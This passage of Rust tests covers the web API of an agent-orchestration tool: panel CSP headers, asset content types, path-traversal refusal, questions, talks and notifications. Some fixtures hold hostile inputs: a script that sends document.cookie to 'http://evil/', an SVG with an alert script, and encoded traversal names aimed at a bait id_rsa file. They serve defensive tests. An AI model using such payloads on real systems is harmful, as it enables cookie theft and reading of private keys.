4675 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4676 Box::pin(async {
4677 Err(anyhow::anyhow!(
4678 "publish the daemon status file: read-only file system"
4679 ))
4680 })
4681 }
4682
4683 static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
4690 static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
4691
4692 fn launch_knocking_on_the_way_out(
4699 _opts: daemon::Opts,
4700 stop: daemon::Stop,
4701 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4702 Box::pin(async move {
4703 while !stop.stopped() {
4704 tokio::time::sleep(Duration::from_millis(2)).await;
4705 }
4706 let addr = PARK_KNOCK
4707 .lock()
4708 .expect("park knock")
4709 .expect("the test set an address");
4710 let heard = request(addr, "GET", "/api/health", None).await.status;
4711 *PARK_HEARD.lock().expect("park heard") = Some(heard);
4712 Ok(())
4713 })
4714 }
4715
4716 async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
4725 for _ in 0..SETTLE_STEPS {
4726 let view = fx.get("/api/loop").await.json();
4727 if want(&view) {
4728 return view;
4729 }
4730 tokio::time::sleep(Duration::from_millis(10)).await;
4731 }
4732 panic!(
4733 "the loop never settled: {}",
4734 fx.get("/api/loop").await.json()
4735 );
4736 }
4737
4738 fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
4740 let store = fx.questions();
4741 let mut q = Question::new(
4742 "20260902-000000-beef".to_owned(),
4743 "implement".to_owned(),
4744 "impl-A".to_owned(),
4745 summary.to_owned(),
4746 "because it matters".to_owned(),
4747 choices.iter().map(|c| (*c).to_owned()).collect(),
4748 );
4749 store.put(&mut q).expect("put question");
4750 q.id
4751 }
4752
4753 fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
4759 let store = fx.questions();
4760 let mut q = Question::new(
4761 "20260902-000000-beef".to_owned(),
4762 "land".to_owned(),
4763 "fix".to_owned(),
4764 "Merge this?".to_owned(),
4765 "the diff is in the panel".to_owned(),
4766 vec!["merge".to_owned(), "hold".to_owned()],
4767 );
4768 let staging = fx.home.path().join("staging");
4771 std::fs::create_dir_all(&staging).expect("staging dir");
4772 let sources: Vec<PathBuf> = assets
4773 .iter()
4774 .map(|(name, bytes)| {
4775 let path = staging.join(name);
4776 std::fs::write(&path, bytes).expect("write staged asset");
4777 path
4778 })
4779 .collect();
4780 store
4781 .put_panel(&mut q, html, &sources)
4782 .expect("write the panel");
4783 store.put(&mut q).expect("put question");
4784 q.id
4785 }
4786
4787 fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
4796 let store = fx.talks();
4797 std::fs::create_dir_all(store.root()).expect("talks dir");
4798 let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
4799 .expect("serialize a seat");
4800 let body = serde_json::json!({
4801 "schema": 1,
4802 "id": id,
4803 "repo": "/repo/magi",
4804 "agent": "mock",
4805 "status": status,
4806 "turns": [],
4807 "created_at": Timestamp::now().to_string(),
4808 "updated_at": Timestamp::now().to_string(),
4809 "seat": seat,
4810 });
4811 std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
4812 store.get(id).expect("the seeded talk has to be readable");
4813 id.to_owned()
4814 }
4815
4816 #[tokio::test]
4817 async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
4818 let fx = Fixture::start().await;
4819 let id = panel(
4820 &fx,
4821 "<h1>Merge?</h1><img src=\"diff.svg\">",
4822 &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
4823 );
4824
4825 for path in [
4826 format!("/api/questions/{id}/panel"),
4827 format!("/api/questions/{id}/asset/diff.svg"),
4828 ] {
4829 let res = fx.get(&path).await;
4830 assert_eq!(res.status, 200, "{path}: {}", res.body);
4831 assert_eq!(
4837 res.header("content-security-policy"),
4838 Some(
4839 "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
4840 font-src data:; base-uri 'none'; form-action 'none'; \
4841 frame-ancestors 'self'"
4842 ),
4843 "{path} is the only thing between a hostile panel and the tailnet"
4844 );
4845 assert_eq!(
4846 res.header("x-content-type-options"),
4847 Some("nosniff"),
4848 "{path}: a browser must not re-decide the type we sent"
4849 );
4850 assert_eq!(
4851 res.header("referrer-policy"),
4852 Some("no-referrer"),
4853 "{path}: a panel must not leak the question id off the machine"
4854 );
4855
4856 let pre = fx.head(&path).await;
4861 assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
4862 assert_eq!(
4863 pre.header("content-security-policy"),
4864 res.header("content-security-policy"),
4865 "{path}: the preflight carries the same policy"
4866 );
4867 assert_eq!(
4868 pre.header("content-type"),
4869 res.header("content-type"),
4870 "{path}: the preflight carries the same type"
4871 );
4872 }
4873 }
4874
4875 #[tokio::test]
4876 async fn a_panel_reaches_the_browser_byte_for_byte() {
4877 let fx = Fixture::start().await;
4878 let html = "<h1>Merge?</h1><p>a < b — 変更</p><script>alert(1)</script>";
4883 let id = panel(&fx, html, &[]);
4884
4885 let res = fx.get(&format!("/api/questions/{id}/panel")).await;
4886
4887 assert_eq!(res.status, 200);
4888 assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
4889 assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
4890 assert_eq!(
4891 res.header("content-disposition"),
4892 None,
4893 "the panel itself is rendered in the frame, not downloaded"
4894 );
4895 }
4896
4897 #[tokio::test]
4898 async fn an_svg_asset_is_a_download_and_a_png_is_not() {
4899 let fx = Fixture::start().await;
4900 let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
4901 let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
4902 let id = panel(
4903 &fx,
4904 "<img src=\"diff.svg\"><img src=\"shot.png\">",
4905 &[("diff.svg", svg), ("shot.png", png)],
4906 );
4907
4908 let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
4909 let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
4910
4911 assert_eq!(as_svg.status, 200);
4912 assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
4913 assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
4918
4919 assert_eq!(as_png.status, 200);
4920 assert_eq!(as_png.header("content-type"), Some("image/png"));
4921 assert_eq!(
4922 as_png.header("content-disposition"),
4923 None,
4924 "a raster image has no execution surface, so tapping it still shows it"
4925 );
4926 assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
4927 }
4928
4929 #[tokio::test]
4930 async fn an_html_asset_is_never_served_as_html() {
4931 let fx = Fixture::start().await;
4932 let id = panel(
4933 &fx,
4934 "<p>see the notes</p>",
4935 &[
4936 (
4937 "notes.html",
4938 b"<script>fetch('http://evil/'+document.cookie)</script>",
4939 ),
4940 ("hook.js", b"fetch('http://evil/')"),
4941 ("data.json", b"{}"),
4942 ("HEADLINE.TXT", b"plain"),
4943 ],
4944 );
4945
4946 for name in ["notes.html", "hook.js", "data.json"] {
4947 let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
4948 assert_eq!(res.status, 200, "{name}: {}", res.body);
4949 assert_eq!(
4954 res.header("content-type"),
4955 Some("application/octet-stream"),
4956 "{name} must not be a type the browser will execute or render"
4957 );
4958 }
4959 let txt = fx
4962 .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
4963 .await;
4964 assert_eq!(
4965 txt.header("content-type"),
4966 Some("text/plain; charset=utf-8")
4967 );
4968 }
4969
4970 #[tokio::test]
4971 async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
4972 let fx = Fixture::start().await;
4973 let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
4974 std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
4978
4979 for encoded in [
4986 "%2e%2e%2fid_rsa",
4987 "..%2fid_rsa",
4988 "..%5cid_rsa",
4989 "%2e%2e%5cid_rsa",
4990 "diff%00.svg",
4991 "..",
4992 ".hidden",
4993 "%2e%2e%2f%2e%2e%2fid_rsa",
4994 ] {
4995 let res = fx
4996 .get(&format!("/api/questions/{id}/asset/{encoded}"))
4997 .await;
4998 assert_eq!(
4999 res.status, 400,
5000 "`{encoded}` has to be refused by name, not looked up: {}",
5001 res.body
5002 );
5003 assert!(res.json()["error"].is_string(), "{}", res.body);
5004 }
5005
5006 for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
5012 let res = fx
5013 .get(&format!("/api/questions/{id}/asset/{literal}"))
5014 .await;
5015 assert_eq!(
5016 res.status, 404,
5017 "`{literal}` must not match the asset route at all: {}",
5018 res.body
5019 );
5020 }
5021 }
5022
5023 #[tokio::test]
5024 async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
5025 let fx = Fixture::start().await;
5026 let plain = ask(&fx, "Which backend?", &["SQLite"]);
5027 let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5028
5029 let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
5033 assert_eq!(none.status, 404, "{}", none.body);
5034 assert!(none.json()["error"].is_string(), "{}", none.body);
5035 assert_eq!(
5036 fx.head(&format!("/api/questions/{plain}/panel"))
5037 .await
5038 .status,
5039 404,
5040 "the preflight is the only way the client can learn this"
5041 );
5042
5043 let missing = fx
5045 .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
5046 .await;
5047 assert_eq!(missing.status, 404, "{}", missing.body);
5048 assert!(missing.json()["error"].is_string(), "{}", missing.body);
5049
5050 assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
5052 assert_eq!(
5053 fx.get("/api/questions/nope/asset/diff.svg").await.status,
5054 404
5055 );
5056 }
5057
5058 #[tokio::test]
5059 async fn a_run_with_an_open_question_reads_as_waiting() {
5060 let fx = Fixture::start().await;
5061 let run = "20260902-000000-beef".to_owned();
5062 write_run(&fx.runs(), &run, RunStatus::Implementing);
5063
5064 let before = fx.get("/api/runs").await.json();
5065 assert_eq!(before[0]["waiting"], false, "{before}");
5066
5067 let store = fx.questions();
5068 let mut q = Question::new(
5069 run.clone(),
5070 "implement".to_owned(),
5071 "impl-A".to_owned(),
5072 "Which backend?".to_owned(),
5073 String::new(),
5074 vec!["SQLite".to_owned()],
5075 );
5076 store.put(&mut q).expect("put");
5077
5078 let during = fx.get("/api/runs").await.json();
5079 assert_eq!(during[0]["waiting"], true, "{during}");
5080
5081 q.answer(Answer::Choice("SQLite".to_owned()))
5084 .expect("answer");
5085 store.put(&mut q).expect("put");
5086 let after = fx.get("/api/runs").await.json();
5087 assert_eq!(after[0]["waiting"], false, "{after}");
5088 }
5089
5090 #[tokio::test]
5091 async fn an_open_question_is_listed_and_counted_by_health() {
5092 let fx = Fixture::start().await;
5093 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5094
5095 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5096 let listed = fx.get("/api/questions").await.json();
5097 assert_eq!(listed.as_array().expect("array").len(), 1);
5098 assert_eq!(listed[0]["id"], id);
5099 assert_eq!(listed[0]["status"], "open");
5100 assert_eq!(listed[0]["choices"][1], "Redis");
5101 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5104 }
5105
5106 #[tokio::test]
5107 async fn answering_records_the_choice_and_a_second_answer_conflicts() {
5108 let fx = Fixture::start().await;
5109 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5110 let path = format!("/api/questions/{id}/answer");
5111
5112 let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
5113 assert_eq!(res.status, 200, "{}", res.body);
5114 let body = res.json();
5115 assert_eq!(body["status"], "answered");
5116 assert_eq!(body["answer"]["choice"], "Redis");
5117
5118 let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
5122 assert_eq!(again.status, 409, "{}", again.body);
5123 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5124 }
5125
5126 #[tokio::test]
5127 async fn saying_something_appends_a_turn_without_answering() {
5128 let fx = Fixture::start().await;
5129 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5130 let path = format!("/api/questions/{id}/say");
5131
5132 let res = fx
5133 .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
5134 .await;
5135 assert_eq!(res.status, 200, "{}", res.body);
5136 let body = res.json();
5137 assert_eq!(body["status"], "open", "talking back is not a decision");
5138 assert_eq!(body["answer"], Value::Null);
5139 assert_eq!(body["thread"][0]["who"], "operator");
5140 assert_eq!(body["thread"][0]["body"], "why not Postgres?");
5141 assert_eq!(body["waiting_on_agent"], true);
5142 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5144 }
5145
5146 #[tokio::test]
5147 async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
5148 let fx = Fixture::start().await;
5149 let store = fx.questions();
5150 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5151 assert_eq!(
5152 fx.get("/api/health").await.json()["questions_needs_owner"],
5153 1
5154 );
5155
5156 let res = fx
5162 .post(
5163 &format!("/api/questions/{id}/say"),
5164 Some(r#"{"body":"why not Postgres?"}"#),
5165 )
5166 .await;
5167 assert_eq!(res.status, 200, "{}", res.body);
5168 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5169 assert_eq!(
5170 fx.get("/api/health").await.json()["questions_needs_owner"],
5171 0,
5172 "waiting on the agent is not waiting on the owner"
5173 );
5174
5175 let mut q = store.get(&id).expect("get");
5179 q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
5180 .expect("reply");
5181 store.put(&mut q).expect("put");
5182 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5183 assert_eq!(
5184 fx.get("/api/health").await.json()["questions_needs_owner"],
5185 1,
5186 "the agent's reply is what should light the banner back up"
5187 );
5188 }
5189
5190 #[tokio::test]
5191 async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
5192 let fx = Fixture::start().await;
5193 let store = fx.questions();
5194
5195 let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5196 let res = fx
5197 .post(
5198 &format!("/api/questions/{empty_id}/say"),
5199 Some(r#"{"body":" "}"#),
5200 )
5201 .await;
5202 assert_eq!(res.status, 400, "{}", res.body);
5203
5204 let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5205 let mut answered = store.get(&answered_id).expect("get");
5206 answered
5207 .answer(Answer::Choice("SQLite".to_owned()))
5208 .expect("answer");
5209 store.put(&mut answered).expect("put");
5210 let res = fx
5211 .post(
5212 &format!("/api/questions/{answered_id}/say"),
5213 Some(r#"{"body":"still there?"}"#),
5214 )
5215 .await;
5216 assert_eq!(res.status, 409, "{}", res.body);
5217
5218 let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5219 let mut abandoned = store.get(&abandoned_id).expect("get");
5220 abandoned.abandon("timed out");
5221 store.put(&mut abandoned).expect("put");
5222 let res = fx
5223 .post(
5224 &format!("/api/questions/{abandoned_id}/say"),
5225 Some(r#"{"body":"still there?"}"#),
5226 )
5227 .await;
5228 assert_eq!(res.status, 409, "{}", res.body);
5229 }
5230
5231 #[tokio::test]
5232 async fn an_answer_the_question_does_not_offer_is_refused() {
5233 let fx = Fixture::start().await;
5234 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5235 let path = format!("/api/questions/{id}/answer");
5236
5237 for body in [
5238 r#"{"choice":"Postgres"}"#,
5239 r#"{"text":"whatever you think"}"#,
5240 r#"{"choice":"Redis","text":"both"}"#,
5241 r#"{}"#,
5242 ] {
5243 let res = fx.post(&path, Some(body)).await;
5244 assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
5245 assert!(res.json()["error"].is_string(), "{}", res.body);
5246 }
5247 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5249 }
5250
5251 #[tokio::test]
5252 async fn a_free_text_question_takes_text_and_not_a_choice() {
5253 let fx = Fixture::start().await;
5254 let id = ask(&fx, "What should the flag be called?", &[]);
5255 let path = format!("/api/questions/{id}/answer");
5256
5257 assert_eq!(
5258 fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
5259 400
5260 );
5261 let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
5262 assert_eq!(res.status, 200, "{}", res.body);
5263 assert_eq!(res.json()["answer"]["text"], "--json");
5264 }
5265
5266 #[tokio::test]
5267 async fn an_unknown_question_is_a_json_404() {
5268 let fx = Fixture::start().await;
5269 let res = fx
5270 .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
5271 .await;
5272 assert_eq!(res.status, 404, "{}", res.body);
5273 assert!(res.json()["error"].is_string());
5274 }
5275
5276 #[tokio::test]
5277 async fn notifications_list_read_dismiss_and_health_agree() {
5278 let fx = Fixture::start().await;
5279 let store = Notices::at(fx.home.path().join("notifications"));
5280 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 0);
5281 let rev0 = fx.get("/api/health").await.json()["notifications_rev"].clone();
5282
5283 let a = store.raise(Notice::warn("task:1", "held")).unwrap();
5284 let b = store.raise(Notice::error("run:2", "blocked")).unwrap();
5285
5286 let health = fx.get("/api/health").await.json();
5287 assert_eq!(health["notifications_unread"], 2);
5288 assert_ne!(
5289 health["notifications_rev"], rev0,
5290 "the badge must move live"
5291 );
5292
5293 let listed = fx.get("/api/notifications").await.json();
5294 assert_eq!(listed["unread"], 2);
5295 assert_eq!(listed["items"].as_array().unwrap().len(), 2);
5296 assert_eq!(listed["items"][0]["severity"], "error", "newest first");
5297
5298 let read = fx
5299 .post(&format!("/api/notifications/{}/read", a.id), None)
5300 .await;
5301 assert_eq!(read.status, 200, "{}", read.body);
5302 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 1);
5303
5304 let gone = fx
5305 .post(&format!("/api/notifications/{}/dismiss", b.id), None)
5306 .await;
5307 assert_eq!(gone.status, 200, "{}", gone.body);
5308 let listed = fx.get("/api/notifications").await.json();
5309 assert_eq!(listed["items"].as_array().unwrap().len(), 1);
5310 assert_eq!(listed["unread"], 0);
5311
5312 store.raise(Notice::info("x", "again")).unwrap();
5313 let all = fx.post("/api/notifications/read-all", None).await;
5314 assert_eq!(all.status, 200, "{}", all.body);
5315 assert_eq!(all.json()["marked"], 1);
5316 assert_eq!(
5317 fx.get("/api/health").await.json()["notifications_unread"],
5318 0
5319 );
5320
5321 let missing = fx.post("/api/notifications/nope/read", None).await;
5322 assert_eq!(missing.status, 404, "{}", missing.body);
5323 assert!(missing.json()["error"].is_string());
5324 }
5325
5326 #[tokio::test]
5333 async fn a_task_cannot_be_filed_over_the_phone_directly() {
5334 let f = Fixture::start().await;
5335
5336 let res = f
5337 .post(
5338 "/api/queue",
5339 Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
5340 )
5341 .await;
5342
5343 assert_eq!(
5344 res.status, 405,
5345 "POST /api/queue must not be a route: {}",
5346 res.body
5347 );
5348 assert!(
5349 f.queue().list().is_empty(),
5350 "a task filed by a route that does not exist must not reach the disk"
5351 );
5352 assert_eq!(f.get("/api/queue").await.status, 200);
5355 }
5356
5357 fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
5359 std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
5360 .expect("checkout dir");
5361 }
5362
5363 #[tokio::test]
5364 async fn repos_list_returns_name_and_path_for_every_configured_root() {
5365 let tmp = TempDir::new().expect("tempdir");
5366 let repo = tmp.path().join("repo");
5367 std::fs::create_dir_all(&repo).expect("repo dir");
5368 let root = tmp.path().join("root");
5369 make_checkout(&root, "github.com", "yukimemi", "magi");
5370 std::fs::write(
5371 repo.join("magi.toml"),
5372 format!(
5373 "[repos]\nroots = [{:?}]\n",
5374 root.to_string_lossy().into_owned()
5375 ),
5376 )
5377 .expect("write magi.toml");
5378
5379 let f = Fixture::with_repo(repo).await;
5380 let res = f.get("/api/repos").await;
5381 assert_eq!(res.status, 200, "{}", res.body);
5382 let list = res.json();
5383 let repos = list.as_array().expect("an array");
5384 assert_eq!(repos.len(), 1);
5385 assert_eq!(repos[0]["name"], "yukimemi/magi");
5386 assert!(
5387 repos[0]["path"]
5388 .as_str()
5389 .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
5390 "{list}"
5391 );
5392 }
5393
5394 #[tokio::test]
5395 async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
5396 let tmp = TempDir::new().expect("tempdir");
5397 let repo = tmp.path().join("repo");
5398 std::fs::create_dir_all(&repo).expect("repo dir");
5399 let root = tmp.path().join("root");
5400 make_checkout(&root, "github.com", "yukimemi", "magi");
5401 std::fs::write(
5402 repo.join("magi.toml"),
5403 format!(
5404 "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
5405 root.to_string_lossy().into_owned()
5406 ),
5407 )
5408 .expect("write magi.toml");
5409
5410 let f = Fixture::with_repo(repo).await;
5411 let first = f.get("/api/repos").await;
5412 assert_eq!(first.json().as_array().map(Vec::len), Some(1));
5413
5414 make_checkout(&root, "github.com", "yukimemi", "rvpm");
5417 let second = f.get("/api/repos").await;
5418 assert_eq!(
5419 second.json().as_array().map(Vec::len),
5420 Some(1),
5421 "a fresh cache must not rescan inside the TTL"
5422 );
5423
5424 let refreshed = f.get("/api/repos?refresh=1").await;
5425 assert_eq!(
5426 refreshed.json().as_array().map(Vec::len),
5427 Some(2),
5428 "an explicit refresh must rescan even inside the TTL"
5429 );
5430 }
5431
5432 const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5438
5439 async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5443 let tmp = TempDir::new().expect("tempdir");
5444 let repo = tmp.path().join("repo");
5445 std::fs::create_dir_all(&repo).expect("repo dir");
5446 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5447 let f = Fixture::with_repo(repo.clone()).await;
5448 (tmp, repo, f)
5449 }
5450
5451 #[tokio::test]
5452 async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5453 let (_tmp, _repo, f) = talk_fixture().await;
5454
5455 let opened = f.post("/api/talks", None).await;
5458 assert_eq!(opened.status, 201, "{}", opened.body);
5459 let body = opened.json();
5460 assert_eq!(body["status"], "open");
5461 assert_eq!(
5462 body["turns"].as_array().unwrap().len(),
5463 0,
5464 "opening takes no agent turn: there is nothing yet to answer"
5465 );
5466
5467 let also_opened = f.post("/api/talks", Some("{}")).await;
5469 assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5470
5471 let listed = f.get("/api/talks").await.json();
5472 assert_eq!(listed.as_array().unwrap().len(), 2);
5473 }
5474
5475 #[tokio::test]
5476 async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5477 let f = Fixture::start().await;
5478 let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5479 let queue = f.queue();
5480 let mut mine = Task::new(
5481 "rename the loader".to_owned(),
5482 "rename the loader".to_owned(),
5483 PathBuf::from("/repo/magi"),
5484 Source::Agent {
5485 run: talk_id.clone(),
5486 node: "chat".to_owned(),
5487 },
5488 );
5489 queue.put(&mut mine).expect("file the task");
5490 let mut theirs = Task::new(
5491 "unrelated".to_owned(),
5492 "unrelated".to_owned(),
5493 PathBuf::from("/repo/magi"),
5494 Source::Human,
5495 );
5496 queue.put(&mut theirs).expect("file the task");
5497
5498 let res = f.get(&format!("/api/talks/{talk_id}")).await;
5499 assert_eq!(res.status, 200, "{}", res.body);
5500 let body = res.json();
5501 assert_eq!(
5502 body["status"], "open",
5503 "filing a task does not close a talk"
5504 );
5505 let tasks = body["tasks"].as_array().expect("tasks array");
5506 assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5507 assert_eq!(tasks[0]["id"], mine.id);
5508 }
5509
5510 #[tokio::test]
5511 async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5512 let (_tmp, _repo, f) = talk_fixture().await;
5513 let id = f.post("/api/talks", None).await.json()["id"]
5514 .as_str()
5515 .expect("id")
5516 .to_owned();
5517
5518 let res = f
5519 .post(
5520 &format!("/api/talks/{id}/say"),
5521 Some(r#"{"text":"what does the queue module do?"}"#),
5522 )
5523 .await;
5524 assert_eq!(res.status, 202, "{}", res.body);
5525 let queued = res.json();
5526 let turns = queued["turns"].as_array().expect("turns array");
5527 assert_eq!(
5528 turns.len(),
5529 1,
5530 "the answer reflects only what is on disk the instant it is sent, \
5531 before the agent's turn - which can run for the whole of \
5532 `[graph] timeout_talk` - has a chance to land: {queued}"
5533 );
5534 assert_eq!(turns[0]["who"], "operator");
5535 assert_eq!(turns[0]["body"], "what does the queue module do?");
5536 assert_eq!(
5537 queued["thinking"], true,
5538 "the accepted response exposes the background turn claim: {queued}"
5539 );
5540
5541 let mut turns_after = 1;
5542 for _ in 0..SETTLE_STEPS {
5543 let detail = f.get(&format!("/api/talks/{id}")).await.json();
5544 turns_after = detail["turns"].as_array().expect("turns array").len();
5545 if turns_after == 2 {
5546 break;
5547 }
5548 tokio::time::sleep(Duration::from_millis(10)).await;
5549 }
5550 assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5551 }
5552
5553 #[tokio::test]
5580 async fn a_dropped_handler_future_after_recording_still_gets_an_agent_reply() {
5581 let tmp = TempDir::new().expect("tempdir");
5582 let repo = tmp.path().join("repo");
5583 std::fs::create_dir_all(&repo).expect("repo dir");
5584 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5585 let home = TempDir::new().expect("temp home");
5586 let talks = Talks::at(home.path().join("talks"));
5587 let ui = Arc::new(
5588 Ui::new(
5589 Queue::at(home.path().join("queue")),
5590 Questions::at(home.path().join("questions")),
5591 talks.clone(),
5592 home.path().join("runs"),
5593 home.path().to_path_buf(),
5594 repo.clone(),
5595 )
5596 .with_worktrees_root(home.path().join("wt")),
5597 );
5598 let cfg = config_for(&repo).await.expect("discover config");
5599
5600 for delay in 0..40u32 {
5601 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5602 let id = talk.id.clone();
5603
5604 let handler = tokio::spawn(talk_say(
5605 State(Arc::clone(&ui)),
5606 Path(id.clone()),
5607 Ok(Json(NewTalkTurn {
5608 text: "what does the queue module do?".to_owned(),
5609 attachments: Vec::new(),
5610 })),
5611 ));
5612 tokio::time::sleep(Duration::from_micros(u64::from(delay) * 500)).await;
5613 handler.abort();
5614 let _ = handler.await;
5617
5618 let mut turns = 0;
5619 for _ in 0..SETTLE_STEPS {
5620 if let Ok(fresh) = talks.get(&id) {
5621 turns = fresh.turns.len();
5622 if turns != 1 {
5623 break;
5624 }
5625 }
5626 tokio::time::sleep(Duration::from_millis(10)).await;
5627 }
5628 assert_ne!(
5629 turns, 1,
5630 "delay {delay}: talk {id} recorded the operator's turn but \
5631 the agent never answered - the reply task was never \
5632 started after the handler future was dropped"
5633 );
5634 }
5635 }
5636
5637 #[tokio::test]
5682 async fn a_dropped_handler_future_after_queueing_still_drains_the_draft() {
5683 let tmp = TempDir::new().expect("tempdir");
5684 let repo = tmp.path().join("repo");
5685 std::fs::create_dir_all(&repo).expect("repo dir");
5686 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5687 let home = TempDir::new().expect("temp home");
5688 let talks = Talks::at(home.path().join("talks"));
5689 let ui = Arc::new(
5690 Ui::new(
5691 Queue::at(home.path().join("queue")),
5692 Questions::at(home.path().join("questions")),
5693 talks.clone(),
5694 home.path().join("runs"),
5695 home.path().to_path_buf(),
5696 repo.clone(),
5697 )
5698 .with_worktrees_root(home.path().join("wt")),
5699 );
5700 let cfg = config_for(&repo).await.expect("discover config");
5701
5702 for attempt in 0..3u32 {
5703 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5704 let id = talk.id.clone();
5705 let turn_guard = ui
5708 .begin_talk_turn(&id)
5709 .expect("claim the turn")
5710 .expect("a fresh talk owes nobody a turn");
5711
5712 let (reached_tx, reached_rx) = tokio::sync::oneshot::channel();
5713 let (release_tx, release_rx) = std::sync::mpsc::channel();
5714 ui.set_busy_queue_gate(BusyQueueGate {
5715 reached: reached_tx,
5716 release: release_rx,
5717 });
5718
5719 let handler = tokio::spawn(talk_say(
5720 State(Arc::clone(&ui)),
5721 Path(id.clone()),
5722 Ok(Json(NewTalkTurn {
5723 text: "what does the queue module do?".to_owned(),
5724 attachments: Vec::new(),
5725 })),
5726 ));
5727
5728 tokio::time::timeout(Duration::from_secs(5), reached_rx)
5733 .await
5734 .unwrap_or_else(|_| {
5735 panic!(
5736 "attempt {attempt}: talk {id} never reached the busy branch's queue write"
5737 )
5738 })
5739 .expect("the busy branch dropped the gate without using it");
5740
5741 let running = talks.get(&id).expect("reload talk");
5748 drain_loop(running, talks.clone(), cfg.clone(), id.clone(), turn_guard).await;
5749
5750 handler.abort();
5754 let _ = handler.await;
5755
5756 let _ = release_tx.send(());
5762
5763 let mut fresh = talks.get(&id).expect("reload talk");
5766 for _ in 0..SETTLE_STEPS {
5767 if fresh.pending.is_empty() && fresh.turns.len() == 2 {
5768 break;
5769 }
5770 tokio::time::sleep(Duration::from_millis(10)).await;
5771 fresh = talks.get(&id).expect("reload talk");
5772 }
5773 assert!(
5774 fresh.pending.is_empty() && fresh.turns.len() == 2,
5775 "attempt {attempt}: talk {id} left the operator's text queued \
5776 with no drainer - the reclaimed turn was dropped along with \
5777 the handler future (pending {:?}, {} turns)",
5778 fresh.pending,
5779 fresh.turns.len()
5780 );
5781 }
5782 }
5783
